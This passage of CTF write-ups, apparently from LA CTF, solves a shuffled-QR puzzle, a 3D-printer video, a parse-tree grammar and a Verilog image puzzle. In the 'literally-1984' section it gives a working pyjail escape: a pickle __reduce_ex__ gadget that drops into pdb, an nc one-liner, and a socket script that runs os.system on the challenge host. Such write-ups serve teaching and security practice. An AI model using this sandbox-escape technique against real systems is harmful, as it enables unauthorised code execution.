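Phase 1 also reads the EC level and mask pattern off the placed top-left chunk (`read_format_info_from_tl_chunk` below). That decode can be sanity-checked in isolation: the 15 format bits are a BCH(15,5) encoding of (EC indicator ∥ mask pattern) XORed with a fixed mask, both constants taken from the QR specification. A stdlib-only round trip (the `bch15_5`/`format_bits` helpers exist only for this sketch, not in the solver):

```python
FORMAT_MASK = 0b101010000010010  # fixed XOR mask for the 15 format bits

def bch15_5(data5: int) -> int:
    # Append 10 zero bits, then reduce modulo the generator polynomial
    # 0b10100110111 to get the BCH(15,5) error-correction remainder.
    g = 0b10100110111
    v = data5 << 10
    for shift in range(14, 9, -1):
        if (v >> shift) & 1:
            v ^= g << (shift - 10)
    return (data5 << 10) | v

def format_bits(ec_indicator: int, mask_pattern: int) -> list[int]:
    # MSB-first bit list, matching the module order the solver reads.
    word = bch15_5((ec_indicator << 3) | mask_pattern) ^ FORMAT_MASK
    return [(word >> (14 - i)) & 1 for i in range(15)]

# Round trip for EC level L (indicator 0b01) with mask pattern 4,
# decoded exactly the way the solver does it.
bits_raw = format_bits(0b01, 4)
fmt_mask = [1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0]
bits = [a ^ b for a, b in zip(bits_raw, fmt_mask)]
ec_level = bits[0] * 2 + bits[1]  # 1 -> "L" in the solver's mapping
mask_pattern = bits[2] * 4 + bits[3] * 2 + bits[4]
assert (ec_level, mask_pattern) == (1, 4)
```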

Key trick to finish:

* For a fixed QR configuration (v7, EC=L, mask pattern), and a fixed *payload length* `nbytes`, many of the *placed codewords* are **invariant** across different payload contents of that same length (they correspond to padding-only regions and their Reed-Solomon EC).
* We can discover these invariant codewords empirically by generating a few random payloads of length `nbytes` with `segno`, extracting the raw (unmasked) placed codewords from the generated matrices, and taking the positions that are identical across all samples.
* Those invariant codewords imply exact expected module colors at many matrix coordinates, giving strong per-position constraints that let us solve the remaining chunk placement via backtracking.
* The only unknown is the payload length, so we iterate `nbytes` until reconstruction yields a decodable `lactf{...}`.
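
Why so many placed codewords are invariant: in QR byte mode (versions 1-9 use a 4-bit mode indicator and an 8-bit character count), everything after the payload is a fixed terminator plus alternating `0xEC`/`0x11` pad codewords, so for a fixed payload length the tail of the data codeword stream never changes, and the Reed-Solomon EC codewords of any padding-only block are fixed too. A stdlib-only sketch using v7-L's 156 data codewords (the `data_codewords` helper is illustrative, not from the solver):

```python
def data_codewords(payload: bytes, data_capacity: int = 156) -> list[int]:
    # QR byte mode, versions 1-9: 4-bit mode indicator (0100), 8-bit length,
    # the payload, up to 4 terminator zeros, zero-fill to a byte boundary,
    # then alternating 0xEC/0x11 pad codewords up to capacity.
    bits = "0100" + format(len(payload), "08b")
    bits += "".join(format(byte, "08b") for byte in payload)
    bits += "0" * min(4, data_capacity * 8 - len(bits))
    bits += "0" * (-len(bits) % 8)
    cws = [int(bits[i : i + 8], 2) for i in range(0, len(bits), 8)]
    for i in range(data_capacity - len(cws)):
        cws.append(0xEC if i % 2 == 0 else 0x11)
    return cws

# Two different payloads of the same length: every codeword after the
# payload + terminator region (index 62 here) is byte-for-byte identical.
cw_a = data_codewords(b"A" * 60)
cw_b = data_codewords(b"B" * 60)
assert cw_a != cw_b
assert cw_a[62:] == cw_b[62:]
assert set(cw_a[62:]) == {0xEC, 0x11}
```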

Running the solver prints the decoded flag and writes the reconstructed QR to `/tmp/qr_solve_solved.png`.

Solution code:

```python
#!/usr/bin/env python3
"""
Solve: error-correction (LA CTF)

The QR (v7, EC=L) was split into 25 (9x9) chunks, shuffled, and reassembled.

Phase 1 (already done in progress.md) identifies 13 chunk placements using
function-pattern (structural) constraints.

Phase 2 (this script) uses a stronger constraint:
For v7-L with a fixed payload length, many placed codewords are deterministic
padding/EC and therefore invariant across different payload contents.
"""

from __future__ import annotations

import os
from typing import Dict, List, Tuple

import numpy as np
from PIL import Image
import segno

SIZE = 45
CHUNK = 9

HERE = os.path.dirname(os.path.abspath(__file__))
ATTACH = os.path.join(HERE, "attachments")
CHALL_PNG = os.path.join(ATTACH, "chall.png")


def load_chunks() -> List[np.ndarray]:
    img = Image.open(CHALL_PNG).convert("L")
    small = img.resize((SIZE, SIZE), Image.Resampling.NEAREST)
    arr = np.array(small, dtype=np.uint8)
    out: List[np.ndarray] = []
    for cy in range(5):
        for cx in range(5):
            out.append(arr[CHUNK * cy : CHUNK * (cy + 1), CHUNK * cx : CHUNK * (cx + 1)].copy())
    assert len(out) == 25
    return out


def dark(pixel: int) -> int:
    # chall.png uses 0 for black, 255 for white.
    return 1 if pixel == 0 else 0


def mask_func(r: int, c: int, pattern: int) -> bool:
    if pattern == 0:
        return (r + c) % 2 == 0
    if pattern == 1:
        return r % 2 == 0
    if pattern == 2:
        return c % 3 == 0
    if pattern == 3:
        return (r + c) % 3 == 0
    if pattern == 4:
        return (r // 2 + c // 3) % 2 == 0
    if pattern == 5:
        return ((r * c) % 2 + (r * c) % 3) == 0
    if pattern == 6:
        return (((r * c) % 2 + (r * c) % 3) % 2) == 0
    if pattern == 7:
        return (((r + c) % 2 + (r * c) % 3) % 2) == 0
    raise ValueError("bad mask pattern")


def read_format_info_from_tl_chunk(chunk_tl: np.ndarray) -> Tuple[str, int]:
    """
    Read format info from the (top-left) finder block region.

    Returns (ec_level_name, mask_pattern).
    """
    bits_raw: List[int] = []

    # Copy 1 around top-left finder:
    # row 8: cols 0-5
    for c in range(6):
        bits_raw.append(dark(int(chunk_tl[8, c])))
    # row 8: col 7 (skip col 6 timing)
    bits_raw.append(dark(int(chunk_tl[8, 7])))
    # row 8: col 8
    bits_raw.append(dark(int(chunk_tl[8, 8])))
    # col 8: rows 7,5,4,3,2,1,0 (skip row 6 timing)
    for r in [7, 5, 4, 3, 2, 1, 0]:
        bits_raw.append(dark(int(chunk_tl[r, 8])))

    # Unmask (XOR) with 0b101010000010010
    fmt_mask = [1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0]
    bits = [a ^ b for a, b in zip(bits_raw, fmt_mask)]

    ec_level = bits[0] * 2 + bits[1]
    mask_pattern = bits[2] * 4 + bits[3] * 2 + bits[4]

    ec_names = {0: "M", 1: "L", 2: "H", 3: "Q"}
    return ec_names.get(ec_level, "?"), mask_pattern


def build_function_mask_v7() -> np.ndarray:
    """
    True where modules are NOT data modules (finder/timing/alignment/version/format/etc).
    """
    m = np.zeros((SIZE, SIZE), dtype=bool)

    # Finder patterns + separators (9x9 incl. separator)
    m[0:9, 0:9] = True
    m[0:9, SIZE - 8 : SIZE] = True
    m[SIZE - 8 : SIZE, 0:9] = True

    # Timing patterns
    m[6, 8 : SIZE - 8] = True
    m[8 : SIZE - 8, 6] = True

    # Alignment patterns (v7: centers at 6, 22, 38)
    for ar in [6, 22, 38]:
        for ac in [6, 22, 38]:
            if ar <= 8 and ac <= 8:
                continue
            if ar <= 8 and ac >= SIZE - 8:
                continue
            if ar >= SIZE - 8 and ac <= 8:
                continue
            m[ar - 2 : ar + 3, ac - 2 : ac + 3] = True

    # Version info (v7+)
    m[0:6, SIZE - 11 : SIZE - 8] = True
    m[SIZE - 11 : SIZE - 8, 0:6] = True

    # Dark module (row 4*version + 9, col 8) => (37,8) for v7
    m[SIZE - 8, 8] = True

    # Format info areas (mark the common bounding parts; these positions are never data)
    m[8, 0:9] = True
    m[0:9, 8] = True
    m[8, SIZE - 8 : SIZE] = True
    m[SIZE - 8 : SIZE, 8] = True

    return m


def data_placement_order(is_function: np.ndarray) -> List[Tuple[int, int]]:
    """
    List of (r,c) for data modules in placement order (bit order).
    """
    place: List[Tuple[int, int]] = []
    col = SIZE - 1
    going_up = True
    while col > 0:
        if col == 6:
            col -= 1
        rows = range(SIZE - 1, -1, -1) if going_up else range(0, SIZE)
        for r in rows:
            for dc in (0, -1):
                c = col + dc
                if c >= 0 and not is_function[r, c]:
                    place.append((r, c))
        going_up = not going_up
        col -= 2
    return place


def extract_codewords_from_segno(payload: bytes, mask_pattern: int) -> List[int]:
    """Extract the 196 raw (unmasked) placed codewords from a segno-generated QR."""
    qr = segno.make(payload, mode="byte", error="L", boost_error=False, version=7, mask=mask_pattern)
    ref = np.array(qr.matrix, dtype=np.uint8)  # 1=dark
    assert ref.shape == (SIZE, SIZE)

    is_function = build_function_mask_v7()
    place = data_placement_order(is_function)
    assert len(place) == 196 * 8

    bits: List[int] = []
    for r, c in place:
        mod = int(ref[r, c])
        raw = mod ^ (1 if mask_func(r, c, mask_pattern) else 0)
        bits.append(raw)

    codewords: List[int] = []
    for i in range(0, len(bits), 8):
        b = 0
        for j in range(8):
            b = (b << 1) | bits[i + j]
        codewords.append(b)
    assert len(codewords) == 196
    return codewords


def invariant_codewords_for_length(nbytes: int, mask_pattern: int, samples: int = 4) -> Dict[int, int]:
    """
    For a fixed payload length, generate a few random payloads and find which
    *placed* codeword positions are invariant (same across all samples).
    """
    rng = np.random.default_rng(0xC0DEF00D)  # deterministic
    cws_samples: List[List[int]] = []
    for _ in range(samples):
        payload = bytes(int(x) for x in rng.integers(0, 256, size=nbytes, dtype=np.uint16))
        cws_samples.append(extract_codewords_from_segno(payload, mask_pattern))

    inv: Dict[int, int] = {}
    for i in range(196):
        vals = {s[i] for s in cws_samples}
        if len(vals) == 1:
            inv[i] = next(iter(vals))
    return inv


def expected_pixels_for_invariant_codewords(mask_pattern: int, inv_cw: Dict[int, int]) -> Dict[Tuple[int, int], int]:
    """Map (r,c) -> expected pixel for all bits belonging to invariant placed codewords."""
    is_function = build_function_mask_v7()
    place = data_placement_order(is_function)
    exp: Dict[Tuple[int, int], int] = {}
    for cw_idx, cw_val in inv_cw.items():
        for bit_in_cw in range(8):
            bit_idx = cw_idx * 8 + bit_in_cw
            r, c = place[bit_idx]
            raw_bit = (cw_val >> (7 - bit_in_cw)) & 1
            mod = raw_bit ^ (1 if mask_func(r, c, mask_pattern) else 0)
            exp[(r, c)] = 0 if mod == 1 else 255
    return exp


def solve_assignment(chunks: List[np.ndarray], exp: Dict[Tuple[int, int], int]) -> Dict[int, int]:
    # Known placements (position index pi = cy*5+cx -> scrambled chunk index ci)
    known: Dict[int, int] = {
        0: 24,  # (0,0)
        1: 21,  # (1,0)
        2: 10,  # (2,0)
        3: 9,  # (3,0)
        4: 15,  # (4,0)
        5: 11,  # (0,1)
        10: 0,  # (0,2)
        12: 1,  # (2,2)
        14: 7,  # (4,2)
        15: 3,  # (0,3)
        20: 5,  # (0,4)
        22: 20,  # (2,4)
        24: 19,  # (4,4)
    }

    used = set(known.values())
    remaining_chunks = [i for i in range(25) if i not in used]
    remaining_positions = [i for i in range(25) if i not in known]

    # Build per-position constraints from expected pixels
    pos_constraints: Dict[int, Dict[Tuple[int, int], int]] = {}
    for pi in remaining_positions:
        cy, cx = divmod(pi, 5)
        cons: Dict[Tuple[int, int], int] = {}
        for lr in range(CHUNK):
            for lc in range(CHUNK):
                r = cy * CHUNK + lr
                c = cx * CHUNK + lc
                v = exp.get((r, c))
                if v is not None:
                    cons[(lr, lc)] = v
        pos_constraints[pi] = cons

    # Candidate chunks for each remaining position
    candidates: Dict[int, List[int]] = {}
    for pi in remaining_positions:
        cons = pos_constraints[pi]
        cand: List[int] = []
        for ci in remaining_chunks:
            ok = True
            ch = chunks[ci]
            for (lr, lc), v in cons.items():
                if int(ch[lr, lc]) != v:
                    ok = False
                    break
            if ok:
                cand.append(ci)
        candidates[pi] = cand

    # Backtrack (MRV)
    order = sorted(remaining_positions, key=lambda p: len(candidates[p]))
    assign: Dict[int, int] = dict(known)
    used2 = set(known.values())

    def bt(idx: int) -> bool:
        if idx == len(order):
            return True
        pi = order[idx]
        for ci in candidates[pi]:
            if ci in used2:
                continue
            assign[pi] = ci
            used2.add(ci)
            if bt(idx + 1):
                return True
            used2.remove(ci)
            del assign[pi]
        return False

    if not bt(0):
        raise RuntimeError("No assignment found under constraints")
    if len(assign) != 25:
        raise RuntimeError(f"Incomplete assignment: {len(assign)}/25")
    return assign


def reconstruct_matrix(chunks: List[np.ndarray], assign: Dict[int, int]) -> np.ndarray:
    out = np.zeros((SIZE, SIZE), dtype=np.uint8)
    for pi, ci in assign.items():
        cy, cx = divmod(pi, 5)
        out[CHUNK * cy : CHUNK * (cy + 1), CHUNK * cx : CHUNK * (cx + 1)] = chunks[ci]
    return out


def decode_qr(qr_mat: np.ndarray) -> str | None:
    img = Image.fromarray(qr_mat).resize((450, 450), Image.Resampling.NEAREST)

    try:
        from pyzbar.pyzbar import decode as zdecode

        res = zdecode(img)
        if res:
            return res[0].data.decode("utf-8", errors="replace")
    except Exception:
        pass

    try:
        import cv2

        det = cv2.QRCodeDetector()
        data, _, _ = det.detectAndDecode(np.array(img))
        if data:
            return data
    except Exception:
        pass

    return None


def main() -> None:
    chunks = load_chunks()

    # Determine mask pattern from TL chunk (chunk 24 at pos (0,0))
    known_tl = 24
    chunk_tl = chunks[known_tl]
    ec_level, mask_pattern = read_format_info_from_tl_chunk(chunk_tl)
    if ec_level != "L":
        raise RuntimeError(f"Unexpected EC level: {ec_level}")

    # Search payload length by leveraging segno invariants.
    for nbytes in range(1, 160):
        try:
            inv = invariant_codewords_for_length(nbytes, mask_pattern, samples=4)
        except Exception:
            # Too long (or otherwise invalid) for v7-L.
            break

        # Need a decent number of invariants to constrain anything.
        if len(inv) < 24:
            continue

        exp = expected_pixels_for_invariant_codewords(mask_pattern, inv)
        try:
            assign = solve_assignment(chunks, exp)
        except RuntimeError:
            continue

        qr = reconstruct_matrix(chunks, assign)
        decoded = decode_qr(qr)
        if decoded and decoded.startswith("lactf{") and decoded.endswith("}"):
            out_path = "/tmp/qr_solve_solved.png"
            Image.fromarray(qr).resize((450, 450), Image.Resampling.NEAREST).save(out_path)
            print(decoded)
            return

    raise SystemExit("Failed to decode for any tested length")


if __name__ == "__main__":
    main()
```

### flag irl

#### Description

A video of a 3D printer printing a text nameplate is provided. The flag is the text being printed, which must be recovered by tracking the printer's motion.

#### Solution

The key insight is that on the **top layers** of a 3D-printed text nameplate, the print head only visits positions where the raised letters exist. By tracking the head's X position (physical X axis) and the bed's X position in the video frame (which maps to the physical Y axis due to the side-on camera angle), we can reconstruct a 2D map of the printed text.

**Step 1: Position tracking (pre-existing)**

The 1080p video (`video1080p.mp4`, 60fps, 29168 frames) had already been processed with template-matching trackers to produce:

* `pos_1080.npy` — head/nozzle (X, Y) pixel position per frame
* `bed_pos_1080.npy` — bed reference point (X, Y, confidence) per frame

The head X tracks the physical X axis (head moves left/right). The bed X tracks the physical Y axis (bed moves forward/backward, appearing as horizontal motion from the camera's oblique angle).

**Step 2: Identify the text-printing region**

During the base layers (frames 0–\~26000), the head sweeps the full width uniformly (rectangular infill). During the top/text layers (frames \~26100–28350), the head only visits positions where letters exist, producing variable-width sweeps. After \~28400 the head parks at the home position.
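
The layer boundaries above were read off the head-X trace; the same transition can be located automatically with a rolling range statistic, since text-layer sweeps are much narrower than base-layer infill sweeps. A minimal sketch on synthetic data (the window size and signal shapes are illustrative only, not taken from the challenge):

```python
import numpy as np

def sweep_widths(hx, win=600):
    """Per-window range (max - min) of the head-X track."""
    n = len(hx) // win
    return np.array([np.ptp(hx[i * win:(i + 1) * win]) for i in range(n)])

# Synthetic stand-in for the head-X signal: wide sweeps (base layers)
# followed by narrow sweeps (text layers).
t = np.linspace(0, 40 * np.pi, 6000)
hx_demo = np.concatenate([150 * np.sin(t[:3000]), 40 * np.sin(t[3000:])])

widths = sweep_widths(hx_demo)
# The sharp drop in per-window range marks the transition into the text layers,
# so a simple threshold on `widths` recovers the frame boundaries.
```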

**Step 3: Reconstruct the 2D print path**

Plot head X vs bed X for the text-layer frames, filtering out fast travel moves (speed > 2 px/frame) to keep only slow printing moves. The resulting 2D histogram reveals the letter shapes.

```python
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from scipy.ndimage import gaussian_filter1d, gaussian_filter
import cv2

OUT = 'samples'

head = np.load(f'{OUT}/pos_1080.npy').astype(float)
bed = np.load(f'{OUT}/bed_pos_1080.npy')

hx = head[:, 0]  # head X = physical X (head moves left/right)
bx = bed[:, 0]   # bed X in video = physical Y (bed moves forward/back)

# Text layer region
s, e = 26100, 28350
hx_seg = gaussian_filter1d(hx[s:e], sigma=1)
bx_seg = gaussian_filter1d(bx[s:e], sigma=1)

# Compute per-frame speed, filter to slow (printing) moves only
dx = np.diff(hx_seg)
dy = np.diff(bx_seg)
speed = np.sqrt(dx**2 + dy**2)
speed = np.append(speed, 0)
mask = speed < 2.0

# Build 2D histogram (head X vs bed X)
x_min, x_max = 975, 1295
y_min, y_max = 1510, 1645
bins_x = int(x_max - x_min)
bins_y = int((y_max - y_min) * 2)  # 2x oversample Y for resolution

hist, _, _ = np.histogram2d(
    hx_seg[mask], bx_seg[mask],
    bins=[bins_x, bins_y],
    range=[[x_min, x_max], [y_min, y_max]]
)

# Render as image (transpose to get rows=Y, cols=X)
img = hist.T

# Crop to text bounding box
mask2 = img > 0
rows = np.any(mask2, axis=1)
cols = np.any(mask2, axis=0)
rmin, rmax = np.where(rows)[0][[0, -1]]
cmin, cmax = np.where(cols)[0][[0, -1]]
cropped = img[max(0, rmin - 2):rmax + 2, max(0, cmin - 2):cmax + 2]

# Scale up and smooth for readability
h, w = cropped.shape
big = cv2.resize(cropped.astype(np.float32), (w * 8, h * 8),
                 interpolation=cv2.INTER_LINEAR)
smooth = gaussian_filter(big, sigma=2.5)

plt.figure(figsize=(30, 15))
plt.imshow(smooth, cmap='hot', interpolation='bilinear', aspect='equal')
plt.axis('off')
plt.tight_layout()
plt.savefig('flag_text.png', dpi=200, bbox_inches='tight')
plt.close()
```

The resulting heatmap shows three rows of text. At this resolution the font renders `f` like `P`, `g`/`e` like `G`, and `}` like `3`, but the text is readable:

```
4n_irl_fla
6_f0r_onc3
}
```

Row 1 also contains the `lactf{` prefix, which renders faintly because the start of the text layer has the fewest data points; prepending it yields the flag.

#### Flag

```
lactf{4n_irl_fla6_f0r_onc3}
```

### grammar

#### Description

Inspired by CS 131 Programming Languages, I decided to make a context-free grammar in EBNF for my flag! But it looks like some squirrels have eaten away at the parse tree...

Provided files: `grammar-notes.txt` (EBNF grammar + notes about the tree) and `tree.png` (parse tree with opaque terminal boxes).

#### Solution

The challenge provides an EBNF grammar that generates flags and a parse tree image where the terminal characters (boxes at the bottom) are blacked out. The goal is to reconstruct the flag by reading the nonterminal chain depths from the tree.

**Grammar analysis:**

The grammar produces flags of the form `lactf{word1_word2_...}` where each word is composed of fragments. Each fragment is one of 5 types:

* `cd` (consonant + digit) - 2 characters
* `vc` (vowel + consonant) - 2 characters
* `vd` (vowel + digit) - 2 characters
* `c` (consonant) - 1 character
* `d` (digit) - 1 character

Each character type chains through numbered nonterminals, so the chain depth determines the specific character:

* Consonants: depth 1=f, 2=g, 3=p, 4=t, 5=r
* Vowels: depth 1=e, 2=o, 3=u
* Digits: depth 1=0, 2=1, 3=4, 4=5

**Tree analysis:**

The notes state that the colored circles represent fragment types, appearing in the sequence `ABACDE BC EAEA` (three words). The image is 1920x1080 with 28 terminal boxes at the bottom.

Step 1: Determine which fragment types are 1-char vs 2-char by checking if colored circle x-positions align with 1 or 2 terminal boxes:

* For 2-char fragments, the colored circle sits at the midpoint of its two terminal boxes
* Spatial analysis confirmed: **A, D = 1-char; B, C, E = 2-char**

This gives `lactf{` (6) + word1 (9) + `_` (1) + word2 (4) + `_` (1) + word3 (6) + `}` (1) = 28 terminal boxes, matching the image.
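
The count can be cross-checked directly from the fragment sequence (a quick sanity check, not part of the solver):

```python
# Fragment widths from the spatial analysis: A, D = 1 char; B, C, E = 2 chars.
frag_len = {'A': 1, 'B': 2, 'C': 2, 'D': 1, 'E': 2}
words = ["ABACDE", "BC", "EAEA"]

word_lens = [sum(frag_len[f] for f in w) for w in words]
# Literal terminals: "lactf{" (6 boxes), two "_" separators, closing "}".
total_boxes = len("lactf{") + sum(word_lens) + 2 + 1
print(word_lens, total_boxes)  # [9, 4, 6] 28
```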

Step 2: Count black circle depths above each terminal box. The tree has 5 rows of black circles between the colored circles (y ≈ 400) and terminal boxes (y ≈ 1000). Circles stack from the bottom up: depth-1 chains have 1 circle at the bottom row, depth-5 chains fill all 5 rows.

Step 3: Determine fragment type assignments using depth constraints:

* **B** has a left branch with depth 5: only `cd` allows con(5)=r on the left (vowels max at depth 3) → **B = cd**
* **E** has a right branch with depth 5: only `vc` allows con(5)=r on the right → **E = vc**
* By elimination → **C = vd**
* **A = c** (consonant), **D = d** (digit) chosen because it produces readable text

Step 4: Decode each fragment:

| Fragment | Depths   | Type | Characters |
| -------- | -------- | ---- | ---------- |
| A1       | 3        | c    | p          |
| B1       | L:5, R:1 | cd   | r0         |
| A2       | 1        | c    | f          |
| C1       | L:1, R:4 | vd   | e5         |
| D1       | 4        | d    | 5          |
| E1       | L:2, R:5 | vc   | or         |
| B2       | L:3, R:3 | cd   | p4         |
| C2       | L:3, R:2 | vd   | u1         |
| E2       | L:1, R:2 | vc   | eg         |
| A3       | 2        | c    | g          |
| E3       | L:1, R:5 | vc   | er         |
| A4       | 4        | c    | t          |

Result: `pr0fe55or` \_ `p4u1` \_ `eggert` = "professor paul eggert" (the UCLA professor who teaches CS 131).

```python
from PIL import Image
import numpy as np

img = Image.open('attachments/tree.png')
arr = np.array(img)
gray = np.mean(arr[:,:,:3], axis=2)

# Circle row y-centers (row1=top/deepest chains, row5=bottom/all chains)
row_centers = [610, 690, 770, 845, 920]
threshold = 500
window_x, window_y = 15, 20

# Content terminal box x-centers and fragment assignments
# A,D = 1-char; B=cd, C=vd, E=vc
content_map = [
    ("A1", 474, "c"), ("B1_L", 538, "con"), ("B1_R", 603, "dig"),
    ("A2", 668, "c"), ("C1_L", 732, "vow"), ("C1_R", 797, "dig"),
    ("D1", 862, "d"), ("E1_L", 927, "vow"), ("E1_R", 991, "con"),
    ("B2_L", 1121, "con"), ("B2_R", 1186, "dig"),
    ("C2_L", 1250, "vow"), ("C2_R", 1315, "dig"),
    ("E2_L", 1444, "vow"), ("E2_R", 1509, "con"),
    ("A3", 1574, "c"), ("E3_L", 1639, "vow"), ("E3_R", 1703, "con"),
    ("A4", 1768, "c"),
]

char_maps = {
    'con': {1:'f', 2:'g', 3:'p', 4:'t', 5:'r'},
    'vow': {1:'e', 2:'o', 3:'u'},
    'dig': {1:'0', 2:'1', 3:'4', 4:'5'},
    'c':   {1:'f', 2:'g', 3:'p', 4:'t', 5:'r'},  # consonant
    'd':   {1:'0', 2:'1', 3:'4', 4:'5'},           # digit
}

flag_chars = []
for label, cx, ctype in content_map:
    depth = 0
    for i in range(4, -1, -1):  # Check rows bottom to top
        ry = row_centers[i]
        x_lo, x_hi = max(0, cx - window_x), min(1919, cx + window_x)
        y_lo, y_hi = max(0, ry - window_y), min(1079, ry + window_y)
        dark = np.sum(gray[y_lo:y_hi+1, x_lo:x_hi+1] < 50)
        if dark > threshold:
            depth += 1
        else:
            break
    flag_chars.append(char_maps[ctype][depth])

# Assemble: word1(9 chars) _ word2(4 chars) _ word3(6 chars)
w1 = ''.join(flag_chars[0:9])
w2 = ''.join(flag_chars[9:13])
w3 = ''.join(flag_chars[13:19])
print(f"lactf{{{w1}_{w2}_{w3}}}")
```

**Flag: `lactf{pr0fe55or_p4u1_eggert}`**

### literally-1984

#### Description

We are given a Python 3.14 “pyjail”:

* Input is length-limited (`< 67`) and must be printable ASCII.
* Blacklisted characters: space, `_`, `.`, `\\`, `"`, `'`, `{}`, `#`, `=`.
* Our input is wrapped into `eval(f"print({inp})")` inside a **subinterpreter** with an audit hook that kills the process after more than 3 audit events.

Goal: get the real flag (the container includes an execute-only `printflag` binary).

#### Solution

Key observation: `concurrent.interpreters.Interpreter.call()` pickles/unpickles arguments and return values across interpreters. The audit hook is only installed in the *subinterpreter*, not in the main interpreter.

So we:

1. Break out of the `print(<inp>)` wrapper by starting our input with `)or(`, making the overall evaluated expression:
   * `print() or (<our expression>)`
2. Modify a picklable object (`exit`, a `_sitebuiltins.Quitter` instance) to override its `__reduce_ex__` method (without typing underscores, using `dir(0)[41]` which is the string `"__reduce_ex__"`).
3. Return that `exit` object, forcing the subinterpreter to pickle it.
4. During *unpickling in the main interpreter*, our custom reduction runs.
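
The gadget works because `pickle` looks up `__reduce_ex__` on the instance and trusts the `(callable, args)` tuple it returns. A minimal single-interpreter demonstration (the `Obj` class and the harmless `list` callable are illustrative; the real exploit patches the `exit` Quitter and returns `(breakpoint, ())`):

```python
import pickle

class Obj:
    pass

o = Obj()
# An instance attribute shadows the type's __reduce_ex__; the pickler finds it
# via getattr(obj, "__reduce_ex__") and serializes whatever call it returns.
o.__reduce_ex__ = lambda *args: (list, ("pwned",))

data = pickle.dumps(o)
result = pickle.loads(data)  # the unpickler calls list("pwned")
print(result)  # ['p', 'w', 'n', 'e', 'd']
```

Any picklable callable can be substituted, which is exactly what makes the cross-interpreter `call()` boundary exploitable.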

Instead of trying to directly reach `os.system` under the tight 66-character limit, we make unpickling call `breakpoint()`, which drops into `pdb`. Even though the jail only reads one line for `inp`, the TCP stream can include additional lines; `pdb` will read them from stdin next. We pre-send:

* `!import os;os.system('/app/printflag')` (pwn.red/jail chroots into `/srv`, so `/srv/app/printflag` in the image appears as `/app/printflag` at runtime)
* `c` to continue execution and let the process exit cleanly

**One-shot exploit input (first line):**

```
)or(setattr(exit,dir(0)[41],lambda*s:(breakpoint,()))or(exit)
```

**Example run with netcat (sends pdb commands after the payload):**

```bash
{ \
  printf '%s\n' ")or(setattr(exit,dir(0)[41],lambda*s:(breakpoint,()))or(exit)"; \
  printf '%s\n' "!import os;os.system('/app/printflag')"; \
  printf '%s\n' c; \
} | nc chall.lac.tf 32323
```

**Automated solver (no external deps):** `solve.py`

```python
#!/usr/bin/env python3
import re
import socket
import time


HOST = "chall.lac.tf"
PORT = 32323


PAYLOAD = ")or(setattr(exit,dir(0)[41],lambda*s:(breakpoint,()))or(exit)"
# pwn.red/jail chroots to /srv, so /srv/app/printflag becomes /app/printflag.
PDB_CMD = "!import os;os.system('/app/printflag')"


def main() -> None:
    script = f"{PAYLOAD}\n{PDB_CMD}\nc\n"
    with socket.create_connection((HOST, PORT), timeout=10) as s:
        s.settimeout(5)

        # Read (best effort) until we see the prompt.
        buf = b""
        deadline = time.monotonic() + 10
        while b"1984> " not in buf and time.monotonic() < deadline:
            try:
                chunk = s.recv(4096)
            except TimeoutError:
                continue
            if not chunk:
                break
            buf += chunk

        s.sendall(script.encode())

        # Read until the server closes the connection (or a generous deadline).
        deadline = time.monotonic() + 30
        while time.monotonic() < deadline:
            try:
                chunk = s.recv(4096)
            except TimeoutError:
                continue
            if not chunk:
                break
            buf += chunk
            deadline = time.monotonic() + 5  # extend while data arrives

    text = buf.decode(errors="replace")
    m = re.search(r"lactf{[^}]+}", text)
    if not m:
        raise SystemExit("flag not found in output")
    print(m.group(0))


if __name__ == "__main__":
    main()
```

### not-just-a-hobby

#### Description

"It's not just a hobby!!!" - A single Verilog file `v.v` is provided.

#### Solution

The challenge provides a Verilog VGA module whose inputs are 7 bits wide (`input [6:0] x, input [6:0] y`) but whose pixel comparisons use values that exceed the 7-bit range (0-127). The key insight is Verilog's bit-width semantics:

* `7'd588`: A 7-bit decimal literal — 588 gets truncated to `588 % 128 = 76`. This comparison **can** match.
* `588` (no width prefix): A 32-bit literal. Since `x` is only 7 bits (0-127), `x == 588` **never** matches.

A pixel coordinate is only "active" (drawn black) when **both** the x and y comparisons are satisfiable with 7-bit inputs. This means:

* Values with `7'd` prefix: truncate via `value % 128`, always reachable
* Bare values ≤ 127: directly reachable
* Bare values > 127: unreachable, the pixel comparison is dead code
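
The reachability rule reduces to a few lines; a sketch of the filter with the values from above (`width=7` matches the module's inputs):

```python
def literal_match_value(value, sized, width=7):
    """Model comparing a `width`-bit signal against a Verilog literal.

    A sized literal (e.g. 7'd588) is truncated modulo 2**width before the
    comparison; a bare literal is 32-bit and only matches if it fits."""
    if sized:
        return value % (1 << width)
    return value if value < (1 << width) else None

print(literal_match_value(588, sized=True))   # 76   (7'd588 is matchable)
print(literal_match_value(588, sized=False))  # None (bare 588 never matches)
print(literal_match_value(100, sized=False))  # 100
```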

Applying this filter and rendering the valid pixels on a 128x128 canvas reveals an image of the "Graphic Design Is My Passion" meme rendered in leet speak, with a stick figure holding an LACTF flag and a small creature.

The text reads across four lines: `lactf{graph1c_d3sign_` / `is_My_` / `PA55i0N!!1!}`

The leet speak substitutions are: `i→1` (graphic), `e→3` (design), `S→5` (PASSION), `O→0` (PASSION).

**Flag:** `lactf{graph1c_d3sign_is_My_PA55i0N!!1!}`

**Solver script:**

```python
import re
from PIL import Image

with open('attachments/v.v', 'r') as f:
    content = f.read()

# Parse all (x == VALUE && y == VALUE) coordinate pairs
pattern = r"\(x\s*==\s*(7'd)?(\d+)\s*&&\s*y\s*==\s*(7'd)?(\d+)\)"
matches = re.findall(pattern, content)

pixels = set()
for x_prefix, x_val, y_prefix, y_val in matches:
    x_val, y_val = int(x_val), int(y_val)

    # Apply 7-bit truncation for 7'd prefixed values
    if x_prefix == "7'd":
        x_actual = x_val % 128
    elif x_val <= 127:
        x_actual = x_val
    else:
        continue  # Unreachable with 7-bit input

    if y_prefix == "7'd":
        y_actual = y_val % 128
    elif y_val <= 127:
        y_actual = y_val
    else:
        continue  # Unreachable with 7-bit input

    pixels.add((x_actual, y_actual))

# Render 128x128 image
img = Image.new('RGB', (128, 128), 'white')
for x, y in pixels:
    img.putpixel((x, y), (0, 0, 0))

img_scaled = img.resize((512, 512), Image.NEAREST)
img_scaled.save('output.png')
print(f"Rendered {len(pixels)} pixels")
```

***

## pwn

### ScrabASM

#### Description

